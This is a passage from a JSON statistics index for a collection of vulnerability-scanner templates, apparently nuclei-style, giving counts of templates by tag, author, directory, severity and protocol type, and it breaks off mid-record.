default-login","count":1},{"name":"zenario","count":1},{"name":"tectuus","count":1},{"name":"visualtools","count":1},{"name":"npm","count":1},{"name":"netrc","count":1},{"name":"qdpm","count":1},{"name":"skywalking","count":1},{"name":"diris","count":1},{"name":"webmin","count":1},{"name":"pacsone","count":1},{"name":"ems","count":1},{"name":"tracer","count":1},{"name":"perl","count":1},{"name":"redcap","count":1},{"name":"gloo","count":1},{"name":"spf","count":1},{"name":"rdp","count":1},{"name":"auth","count":1},{"name":"fastapi","count":1},{"name":"shopxo","count":1},{"name":"ghost","count":1},{"name":"svnserve","count":1},{"name":"phpfastcache","count":1},{"name":"cobub","count":1},{"name":"st","count":1},{"name":"opm","count":1},{"name":"keenetic","count":1},{"name":"ricoh","count":1},{"name":"mobileiron","count":1},{"name":"rubedo","count":1},{"name":"springframework","count":1},{"name":"wmt","count":1},{"name":"wing-ftp","count":1},{"name":"mediumish","count":1},{"name":"soar","count":1},{"name":"appweb","count":1},{"name":"vnc","count":1},{"name":"synnefo","count":1},{"name":"bash","count":1},{"name":"wuzhicms","count":1},{"name":"sprintful","count":1},{"name":"kong","count":1},{"name":"yii","count":1},{"name":"office365","count":1},{"name":"emc","count":1},{"name":"jeewms","count":1},{"name":"wooyun","count":1},{"name":"mariadb","count":1},{"name":"codeigniter","count":1},{"name":"webftp","count":1},{"name":"bolt","count":1},{"name":"wavemaker","count":1},{"name":"linux","count":1},{"name":"flink","count":1},{"name":"eyou","count":1},{"name":"monitorr","count":1},{"name":"ssltls","count":1},{"name":"zzzcms","count":1},{"name":"clink-office","count":1},{"name":"fiori","count":1},{"name":"sqlite","count":1},{"name":"node","count":1},{"name":"pulsesecure","count":1},{"name":"ntopng","count":1},{"name":"mysql","count":1},{"name":"checkpoint","count":1},{"name":"lanproxy","count":1},{"name":"duomicms","count":1},{"name":"parentlink","count":1},{"name":"nps","count":1},{"name":"moin","count":1},{"name":"node-red-dashboard","count":1},{"name":"eprints","count":1},{"name":"apos","count":1},{"name":"setup","count":1},{"name":"miscrsoft","count":1},{"name":"pyramid","count":1},{"name":"hortonworks","count":1},{"name":"linksys","count":1},{"name":"scimono","count":1},{"name":"faraday","count":1},{"name":"nsasg","count":1},{"name":"owa","count":1},{"name":"b2evolution","count":1},{"name":"phpunit","count":1},{"name":"openstack","count":1},{"name":"anchorcms","count":1},{"name":"calendarix","count":1},{"name":"woocomernce","count":1},{"name":"plugin","count":1},{"name":"tongda","count":1},{"name":"metinfo","count":1},{"name":"opentsdb","count":1},{"name":"fortigate","count":1},{"name":"arl","count":1},{"name":"powercreator","count":1},{"name":"phpinfo","count":1},{"name":"azkaban","count":1},{"name":"alerta","count":1},{"name":"plone","count":1},{"name":"seacms","count":1},{"name":"cgi","count":1},{"name":"api-manager","count":1},{"name":"pagespeed","count":1},{"name":"sitecore","count":1},{"name":"fortilogger","count":1},{"name":"xml","count":1},{"name":"shopware","count":1},{"name":"tapestry","count":1},{"name":"asus","count":1},{"name":"sureline","count":1},{"name":"yealink","count":1},{"name":"achecker","count":1},{"name":"wondercms","count":1},{"name":"zcms","count":1},{"name":"vscode","count":1},{"name":"openerp","count":1},{"name":"ilo4","count":1},{"name":"spidercontrol","count":1},{"name":"panos","count":1},{"name":"cacti","count":1},{"name":"linkedin","count":1},{"name":"tensorflow","count":1},{"name":"glances","count":1},{"name":"yachtcontrol","count":1},{"name":"mirai","count":1},{"name":"lutron","count":1},{"name":"servicedesk","count":1},{"name":"jsp","count":1},{"name":"alibaba","count":1},{"name":"flash","count":1},{"name":"haproxy","count":1},{"name":"druid","count":1},{"name":"comodo","count":1},{"name":"bitly","count":1},{"name":"dvr","count":1},{"name":"sentry","count":1},{"name":"webadmin","count":1},{"name":"phpfusion","count":1},{"name":"concrete","count":1},{"name":"nexusdb","count":1},{"name":"gateone","count":1},{"name":"acexy","count":1},{"name":"scs","count":1},{"name":"tamronos","count":1},{"name":"beanshell","count":1},{"name":"xmlchart","count":1},{"name":"starttls","count":1},{"name":"opencast","count":1},{"name":"trilithic","count":1},{"name":"aspnuke","count":1},{"name":"interlib","count":1},{"name":"alertmanager","count":1},{"name":"payara","count":1},{"name":"iceflow","count":1},{"name":"emby","count":1},{"name":"gotmls","count":1},{"name":"default","count":1},{"name":"myucms","count":1},{"name":"robomongo","count":1},{"name":"openemr","count":1},{"name":"phalcon","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"zeroshell","count":1},{"name":"adminer","count":1},{"name":"jenzabar","count":1},{"name":"fastcgi","count":1},{"name":"heroku","count":1},{"name":"selea","count":1},{"name":"triconsole","count":1},{"name":"db","count":1},{"name":"octobercms","count":1},{"name":"maccmsv10","count":1},{"name":"jmx","count":1},{"name":"netdata","count":1},{"name":"spring","count":1},{"name":"rujjie","count":1},{"name":"74cms","count":1},{"name":"enumeration","count":1},{"name":"tileserver","count":1},{"name":"fortinet","count":1},{"name":"fortiweb","count":1},{"name":"gitlist","count":1},{"name":"cors","count":1},{"name":"ec2","count":1},{"name":"darkstat","count":1},{"name":"servicenow","count":1},{"name":"tieline","count":1},{"name":"csod","count":1},{"name":"mautic","count":1},{"name":"mongo","count":1},{"name":"plc","count":1},{"name":"sourcebans","count":1},{"name":"huijietong","count":1},{"name":"h3c-imc","count":1},{"name":"owasp","count":1},{"name":"lighttpd","count":1},{"name":"expressjs","count":1},{"name":"qsan","count":1},{"name":"oscommerce","count":1},{"name":"sar2html","count":1},{"name":"lansweeper","count":1},{"name":"kubeflow","count":1},{"name":"salesforce","count":1},{"name":"discord","count":1},{"name":"mongoshake","count":1},{"name":"oneblog","count":1},{"name":"rabbitmq","count":1},{"name":"websvn","count":1},{"name":"proftpd","count":1},{"name":"webui","count":1},{"name":"viewpoint","count":1},{"name":"upnp","count":1},{"name":"zte","count":1},{"name":"argussurveillance","count":1},{"name":"nweb2fax","count":1},{"name":"adb","count":1},{"name":"weiphp","count":1},{"name":"eyelock","count":1},{"name":"episerver","count":1},{"name":"webmodule-ee","count":1},{"name":"lg-nas","count":1},{"name":"codemeter","count":1},{"name":"prestashop","count":1},{"name":"feifeicms","count":1},{"name":"jfrog","count":1},{"name":"openrestry","count":1},{"name":"enum","count":1},{"name":"xff","count":1},{"name":"avtech","count":1},{"name":"apiman","count":1},{"name":"ulterius","count":1},{"name":"circontrorl","count":1},{"name":"lancom","count":1},{"name":"idemia","count":1},{"name":"ruckus","count":1},{"name":"addpac","count":1},{"name":"solarlog","count":1},{"name":"qcubed","count":1},{"name":"smartsense","count":1},{"name":"wiki","count":1},{"name":"rsyncd","count":1},{"name":"expn","count":1},{"name":"tensorboard","count":1},{"name":"bazarr","count":1},{"name":"sceditor","count":1},{"name":"favicon","count":1},{"name":"trane","count":1},{"name":"kafdrop","count":1},{"name":"centreon","count":1},{"name":"landray","count":1},{"name":"tika","count":1},{"name":"rmc","count":1},{"name":"netgenie","count":1},{"name":"domxss","count":1},{"name":"mpsec","count":1},{"name":"dom","count":1},{"name":"acontent","count":1},{"name":"wifisky","count":1},{"name":"wildfly","count":1},{"name":"k8s","count":1},{"name":"wamp","count":1},{"name":"drone","count":1},{"name":"bedita","count":1},{"name":"upload","count":1},{"name":"redwood","count":1},{"name":"rmi","count":1},{"name":"froxlor","count":1},{"name":"zend","count":1},{"name":"nc2","count":1},{"name":"socomec","count":1},{"name":"opensns","count":1},{"name":"rhymix","count":1},{"name":"wavlink","count":1},{"name":"zm","count":1},{"name":"zookeeper","count":1},{"name":"cyberoam","count":1},{"name":"htmli","count":1},{"name":"empirecms","count":1},{"name":"mdb","count":1},{"name":"octoprint","count":1},{"name":"stem","count":1},{"name":"tpshop","count":1},{"name":"javamelody","count":1},{"name":"etouch","count":1},{"name":"swagger","count":1},{"name":"dompdf","count":1},{"name":"centos","count":1},{"name":"fortigates","count":1},{"name":"commscope","count":1},{"name":"simplecrm","count":1},{"name":"solman","count":1},{"name":"circontrol","count":1},{"name":"postgres","count":1},{"name":"ioncube","count":1},{"name":"javascript","count":1},{"name":"chinaunicom","count":1},{"name":"gridx","count":1},{"name":"qvisdvr","count":1},{"name":"ueditor","count":1},{"name":"discourse","count":1},{"name":"accela","count":1},{"name":"couchbase","count":1},{"name":"blue-ocean","count":1},{"name":"dbeaver","count":1},{"name":"resourcespace","count":1},{"name":"javafaces","count":1},{"name":"ganglia","count":1}],"authors":[{"name":"pikpikcu","count":243},{"name":"dhiyaneshdk","count":240},{"name":"pdteam","count":196},{"name":"daffainfo","count":160},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":131},{"name":"gy741","count":71},{"name":"madrobot","count":62},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"meme-lord","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"xelkomy","count":4},{"name":"elsfa7110","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"shifacyclewala","count":3},{"name":"vsh00t","count":3},{"name":"incogbyte","count":3},{"name":"f1tz","count":3},{"name":"binaryfigments","count":3},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"0w4ys","count":3},{"name":"shine","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"jarijaas","count":3},{"name":"koti2","count":2},{"name":"random-robbie","count":2},{"name":"0xelkomy","count":2},{"name":"lu4nx","count":2},{"name":"arcc","count":2},{"name":"hetroublemakr","count":2},{"name":"davidmckennirey","count":2},{"name":"0xprial","count":2},{"name":"kiblyn11","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"w4cky_","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"afaq","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"moritz nentwig","count":2},{"name":"zomsop82","count":2},{"name":"mohammedsaneem","count":2},{"name":"swissky","count":2},{"name":"gevakun","count":2},{"name":"bp0lr","count":2},{"name":"nkxxkn","count":2},{"name":"sushantkamble","count":2},{"name":"ree4pwn","count":2},{"name":"gal nagli","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"ehsahil","count":2},{"name":"fabaff","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"0xcrypto","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amsda","count":2},{"name":"0xrudra","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"udit_thakkur","count":2},{"name":"parth","count":2},{"name":"0xsapra","count":2},{"name":"hahwul","count":2},{"name":"geraldino2","count":1},{"name":"flag007","count":1},{"name":"intx0x80","count":1},{"name":"qlkwej","count":1},{"name":"_c0wb0y_","count":1},{"name":"cookiehanhoan","count":1},{"name":"idealphase","count":1},{"name":"elmahdi","count":1},{"name":"patralos","count":1},{"name":"micha3lb3n","count":1},{"name":"hakluke","count":1},{"name":"whynotke","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"rtcms","count":1},{"name":"furkansenan","count":1},{"name":"th3.d1p4k","count":1},{"name":"rojanrijal","count":1},{"name":"juicypotato1","count":1},{"name":"nytr0gen","count":1},{"name":"iampritam","count":1},{"name":"_harleo","count":1},{"name":"exploitation","count":1},{"name":"0ut0fb4nd","count":1},{"name":"dogasantos","count":1},{"name":"bjhulst","count":1},{"name":"raesene","count":1},{"name":"ipanda","count":1},{"name":"akash.c","count":1},{"name":"aresx","count":1},{"name":"kurohost","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"remonsec","count":1},{"name":"daviey","count":1},{"name":"borna nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"alex","count":1},{"name":"mass0ma","count":1},{"name":"tirtha_mandal","count":1},{"name":"adrianmf","count":1},{"name":"abison_binoy","count":1},{"name":"yashanand155","count":1},{"name":"notsoevilweasel","count":1},{"name":"pratik khalane","count":1},{"name":"ooooooo_q","count":1},{"name":"affix","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"retr0","count":1},{"name":"52971","count":1},{"name":"soyelmago","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"its0x08","count":1},{"name":"toufik airane","count":1},{"name":"un-fmunozs","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"makyotox","count":1},{"name":"@dwisiswant0","count":1},{"name":"alph4byt3","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"yashgoti","count":1},{"name":"ldionmarcil","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"absshax","count":1},{"name":"akshansh","count":1},{"name":"tim_koopmans","count":1},{"name":"sickwell","count":1},{"name":"huowuzhao","count":1},{"name":"shelld3v","count":1},{"name":"infosecsanyam","count":1},{"name":"zandros0","count":1},{"name":"evolutionsec","count":1},{"name":"kareemse1im","count":1},{"name":"johnjhacking","count":1},{"name":"rodnt","count":1},{"name":"fmunozs","count":1},{"name":"schniggie","count":1},{"name":"ajaysenr","count":1},{"name":"sullo","count":1},{"name":"willd96","count":1},{"name":"bolli95","count":1},{"name":"luci","count":1},{"name":"deena","count":1},{"name":"blckraven","count":1},{"name":"shifacyclewla","count":1},{"name":"c3l3si4n","count":1},{"name":"revblock","count":1},{"name":"ringo","count":1},{"name":"shreyapohekar","count":1},{"name":"sy3omda","count":1},{"name":"udyz","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ohlinge","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"streetofhackerr007","count":1},{"name":"ilovebinbash","count":1},{"name":"_darrenmartyn","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"naglinagli","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"luskabol","count":1},{"name":"apt-mirror","count":1},{"name":"b0yd","count":1},{"name":"r3naissance","count":1},{"name":"sshell","count":1},{"name":"me9187","count":1},{"name":"co0nan","count":1},{"name":"philippdelteil","count":1},{"name":"berkdusunur","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"0h1in9e","count":1},{"name":"knassar702","count":1},{"name":"jeya seelan","count":1},{"name":"kabirsuda","count":1},{"name":"jteles","count":1},{"name":"s1r1u5_","count":1},{"name":"sicksec","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"0xteles","count":1},{"name":"undefl0w","count":1},{"name":"andirrahmani1","count":1},{"name":"andysvints","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"taielab","count":1},{"name":"vzamanillo","count":1},{"name":"mesaglio","count":1},{"name":"johnk3r","count":1},{"name":"mhdsamx","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"b4uh0lz","count":1},{"name":"smaranchand","count":1},{"name":"pudsec","count":1},{"name":"whoever","count":1},{"name":"bernardofsr","count":1},{"name":"mubassirpatel","count":1},{"name":"bad5ect0r","count":1},{"name":"dawid czarnecki","count":1},{"name":"divya_mudgal","count":1},{"name":"becivells","count":1},{"name":"0xtavian","count":1},{"name":"thezakman","count":1},{"name":"zhenwarx","count":1},{"name":"elder tao","count":1},{"name":"regala_","count":1},{"name":"j33n1k4","count":1},{"name":"fopina","count":1},{"name":"defr0ggy","count":1},{"name":"hanlaomo","count":1},{"name":"chron0x","count":1},{"name":"pdp","count":1},{"name":"yavolo","count":1},{"name":"noamrathaus","count":1},{"name":"sec_hawk","count":1}],"directory":[{"name":"cves","count":631},{"name":"vulnerabilities","count":281},{"name":"exposed-panels","count":225},{"name":"exposures","count":182},{"name":"technologies","count":160},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":29},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":592},{"name":"high","count":504},{"name":"medium","count":398},{"name":"critical","count":230},{"name":"low","count":161}],"types":[{"name":"http","count":1785},{"name":"file","count":46},{"name":"network","count":38},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":632},{"name":"panel","count":232},{"name":"xss","count":224},{"name":"exposure","count":214},{"name":"lfi","count":207},{"name":"wordpress","count":203},{"name":"rce","count":189},{"name":"cve2020","count":157},{"name":"wp-plugin","count":136},{"name":"tech","count":105},{"name":"cve2021","count":104},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":79},{"name":"takeover","count":74},{"name":"","count":66},{"name":"apache","count":64},{"name":"token","count":64},{"name":"default-login","count":57},{"name":"iot","count":56},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"oob","count":45},{"name":"joomla","count":40},{"name":"network","count":38},{"name":"sqli","count":37},{"name":"cve2010","count":32},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"oracle","count":30},{"name":"workflow","count":30},{"name":"logs","count":30},{"name":"jira","count":27},{"name":"atlassian","count":27},{"name":"misc","count":27},{"name":"redirect","count":25},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"disclosure","count":18},{"name":"cve2015","count":18},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"router","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"misconfig","count":13},{"name":"cve2011","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"weblogic","count":12},{"name":"php","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"devops","count":11},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"xxe","count":9},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"scada","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"nginx","count":7},{"name":"backup","count":7},{"name":"vmware","count":7},{"name":"cms","count":7},{"name":"cve2009","count":7},{"name":"google","count":6},{"name":"laravel","count":6},{"name":"api","count":6},{"name":"files","count":6},{"name":"dell","count":6},{"name":"netgear","count":6},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"cve2008","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"confluence","count":5},{"name":"fileupload","count":5},{"name":"microsoft","count":5},{"name":"circarlife","count":5},{"name":"wp-theme","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"drupal","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"docker","count":5},{"name":"printer","count":5},{"name":"ibm","count":5},{"name":"phpmyadmin","count":5},{"name":"nodejs","count":4},{"name":"elastic","count":4},{"name":"jolokia","count":4},{"name":"exchange","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"tomcat","count":4},{"name":"deserialization","count":4},{"name":"firmware","count":4},{"name":"hp","count":4},{"name":"asp","count":4},{"name":"grafana","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"crlf","count":4},{"name":"vpn","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"zimbra","count":4},{"name":"r-seenet","count":3},{"name":"itop","count":3},{"name":"caucho","count":3},{"name":"kevinlab","count":3},{"name":"log","count":3},{"name":"mongodb","count":3},{"name":"zabbix","count":3},{"name":"httpd","count":3},{"name":"nexus","count":3},{"name":"oa","count":3},{"name":"zhiyuan","count":3},{"name":"symfony","count":3},{"name":"terramaster","count":3},{"name":"microstrategy","count":3},{"name":"amazon","count":3},{"name":"slack","count":3},{"name":"springcloud","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"git","count":3},{"name":"tikiwiki","count":3},{"name":"opensis","count":3},{"name":"kubernetes","count":3},{"name":"openssh","count":3},{"name":"bypass","count":3},{"name":"backups","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"ofbiz","count":3},{"name":"fpd","count":3},{"name":"bitrix","count":3},{"name":"intrusive","count":3},{"name":"wso2","count":3},{"name":"resin","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"dos","count":2},{"name":"jboss","count":2},{"name":"shellshock","count":2},{"name":"cache","count":2},{"name":"nagios","count":2},{"name":"akkadian","count":2},{"name":"keycloak","count":2},{"name":"proxy","count":2},{"name":"splunk","count":2},{"name":"horde","count":2},{"name":"natshell","count":2},{"name":"dolibarr","count":2},{"name":"saltstack","count":2},{"name":"status","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"sonicwall","count":2},{"name":"vrealize","count":2},{"name":"chamilo","count":2},{"name":"leak","count":2},{"name":"akamai","count":2},{"name":"frp","count":2},{"name":"openam","count":2},{"name":"azure","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"jsf","count":2},{"name":"maian","count":2},{"name":"chiyu","count":2},{"name":"ecology","count":2},{"name":"rockethchat","count":2},{"name":"hpe","count":2},{"name":"ucmdb","count":2},{"name":"openfire","count":2},{"name":"paloalto","count":2},{"name":"couchdb","count":2},{"name":"igs","count":2},{"name":"trixbox","count":2},{"name":"bigip","count":2},{"name":"emerge","count":2},{"name":"smtp","count":2},{"name":"glassfish","count":2},{"name":"prometheus","count":2},{"name":"yapi","count":2},{"name":"icewarp","count":2},{"name":"backdoor","count":2},{"name":"hjtcloud","count":2},{"name":"grav","count":2},{"name":"kentico","count":2},{"name":"voipmonitor","count":2},{"name":"prestashop","count":2},{"name":"idrac","count":2},{"name":"cve2005","count":2},{"name":"sharepoint","count":2},{"name":"xxljob","count":2},{"name":"spark","count":2},{"name":"webcam","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"firebase","count":2},{"name":"huawei","count":2},{"name":"jeedom","count":2},{"name":"globalprotect","count":2},{"name":"injection","count":2},{"name":"rockmongo","count":2},{"name":"netis","count":2},{"name":"waf","count":2},{"name":"oauth","count":2},{"name":"flir","count":2},{"name":"telerik","count":2},{"name":"guacamole","count":2},{"name":"avantfax","count":2},{"name":"wordfence","count":2},{"name":"seeyon","count":2},{"name":"strapi","count":2},{"name":"plesk","count":2},{"name":"pega","count":2},{"name":"sonarqube","count":2},{"name":"odoo","count":2},{"name":"showdoc","count":2},{"name":"github","count":2},{"name":"hoteldruid","count":2},{"name":"smb","count":2},{"name":"cve2007","count":2},{"name":"hashicorp","count":2},{"name":"linkerd","count":2},{"name":"mcafee","count":2},{"name":"mida","count":2},{"name":"jellyfin","count":2},{"name":"mail","count":2},{"name":"kibana","count":2},{"name":"geowebserver","count":2},{"name":"nextjs","count":2},{"name":"discourse","count":1},{"name":"pippoint","count":1},{"name":"cloudflare","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"blind","count":1},{"name":"pyramid","count":1},{"name":"webui","count":1},{"name":"tenda","count":1},{"name":"xmlchart","count":1},{"name":"memcached","count":1},{"name":"shopxo","count":1},{"name":"panos","count":1},{"name":"codeigniter","count":1},{"name":"rabbitmq","count":1},{"name":"nweb2fax","count":1},{"name":"aruba","count":1},{"name":"openstack","count":1},{"name":"sgp","count":1},{"name":"empirecms","count":1},{"name":"ns","count":1},{"name":"netsweeper","count":1},{"name":"ems","count":1},{"name":"plc","count":1},{"name":"dotnet","count":1},{"name":"expressjs","count":1},{"name":"cacti","count":1},{"name":"centreon","count":1},{"name":"pacsone","count":1},{"name":"mobileiron","count":1},{"name":"pagespeed","count":1},{"name":"landrayoa","count":1},{"name":"eyelock","count":1},{"name":"concrete","count":1},{"name":"proftpd","count":1},{"name":"visualtools","count":1},{"name":"api-manager","count":1},{"name":"clockwatch","count":1},{"name":"websvn","count":1},{"name":"jenzabar","count":1},{"name":"addpac","count":1},{"name":"mysql","count":1},{"name":"gloo","count":1},{"name":"default","count":1},{"name":"stem","count":1},{"name":"wiki","count":1},{"name":"doh","count":1},{"name":"avalanche","count":1},{"name":"asus","count":1},{"name":"skywalking","count":1},{"name":"alertmanager","count":1},{"name":"tika","count":1},{"name":"bolt","count":1},{"name":"cerebro","count":1},{"name":"shopware","count":1},{"name":"opencast","count":1},{"name":"accela","count":1},{"name":"lanproxy","count":1},{"name":"vscode","count":1},{"name":"rmi","count":1},{"name":"acontent","count":1},{"name":"ilo","count":1},{"name":"tpshop","count":1},{"name":"erp-nc","count":1},{"name":"solarlog","count":1},{"name":"discord","count":1},{"name":"vsftpd","count":1},{"name":"sourcebans","count":1},{"name":"floc","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"geutebruck","count":1},{"name":"livezilla","count":1},{"name":"phpinfo","count":1},{"name":"geddy","count":1},{"name":"cse","count":1},{"name":"mara","count":1},{"name":"influxdb","count":1},{"name":"bedita","count":1},{"name":"fastapi","count":1},{"name":"azkaban","count":1},{"name":"redis","count":1},{"name":"salesforce","count":1},{"name":"smartblog","count":1},{"name":"yachtcontrol","count":1},{"name":"csod","count":1},{"name":"druid","count":1},{"name":"javamelody","count":1},{"name":"krweb","count":1},{"name":"totaljs","count":1},{"name":"hortonworks","count":1},{"name":"scimono","count":1},{"name":"cocoon","count":1},{"name":"bitly","count":1},{"name":"fortiweb","count":1},{"name":"expn","count":1},{"name":"javascript","count":1},{"name":"tectuus","count":1},{"name":"selea","count":1},{"name":"fortinet","count":1},{"name":"rujjie","count":1},{"name":"commax","count":1},{"name":"spf","count":1},{"name":"yealink","count":1},{"name":"lotuscms","count":1},{"name":"owasp","count":1},{"name":"node-red-dashboard","count":1},{"name":"primetek","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"phpunit","count":1},{"name":"bazarr","count":1},{"name":"mpsec","count":1},{"name":"miscrsoft","count":1},{"name":"zarafa","count":1},{"name":"adminer","count":1},{"name":"openerp","count":1},{"name":"linux","count":1},{"name":"biometrics","count":1},{"name":"emby","count":1},{"name":"xiuno","count":1},{"name":"lg-nas","count":1},{"name":"xunchi","count":1},{"name":"mongoshake","count":1},{"name":"couchbase","count":1},{"name":"ec2","count":1},{"name":"iceflow","count":1},{"name":"froxlor","count":1},{"name":"cherokee","count":1},{"name":"ulterius","count":1},{"name":"realteo","count":1},{"name":"wazuh","count":1},{"name":"redhat","count":1},{"name":"npm","count":1},{"name":"tracer","count":1},{"name":"setup","count":1},{"name":"webadmin","count":1},{"name":"keenetic","count":1},{"name":"adb","count":1},{"name":"manageengine","count":1},{"name":"embedthis","count":1},{"name":"cgi","count":1},{"name":"tjws","count":1},{"name":"postgres","count":1},{"name":"labtech","count":1},{"name":"majordomo2","count":1},{"name":"spectracom","count":1},{"name":"clave","count":1},{"name":"xff","count":1},{"name":"sophos","count":1},{"name":"st","count":1},{"name":"smartsense","count":1},{"name":"monitorix","count":1},{"name":"interlib","count":1},{"name":"springframework","count":1},{"name":"faraday","count":1},{"name":"grails","count":1},{"name":"dvr","count":1},{"name":"fortilogger","count":1},{"name":"sidekiq","count":1},{"name":"cors","count":1},{"name":"finereport","count":1},{"name":"jsp","count":1},{"name":"aspnuke","count":1},{"name":"ioncube","count":1},{"name":"tongda","count":1},{"name":"iptime","count":1},{"name":"vnc","count":1},{"name":"circontrol","count":1},{"name":"flash","count":1},{"name":"xvr","count":1},{"name":"openemr","count":1},{"name":"owa","count":1},{"name":"zcms","count":1},{"name":"turbocrm","count":1},{"name":"jitsi","count":1},{"name":"jquery","count":1},{"name":"axis","count":1},{"name":"wing-ftp","count":1},{"name":"argussurveillance","count":1},{"name":"bullwark","count":1},{"name":"maccmsv10","count":1},{"name":"tensorflow","count":1},{"name":"perl","count":1},{"name":"ruckus","count":1},{"name":"ganglia","count":1},{"name":"bruteforce","count":1},{"name":"subrion","count":1},{"name":"svn","count":1},{"name":"rfi","count":1},{"name":"upn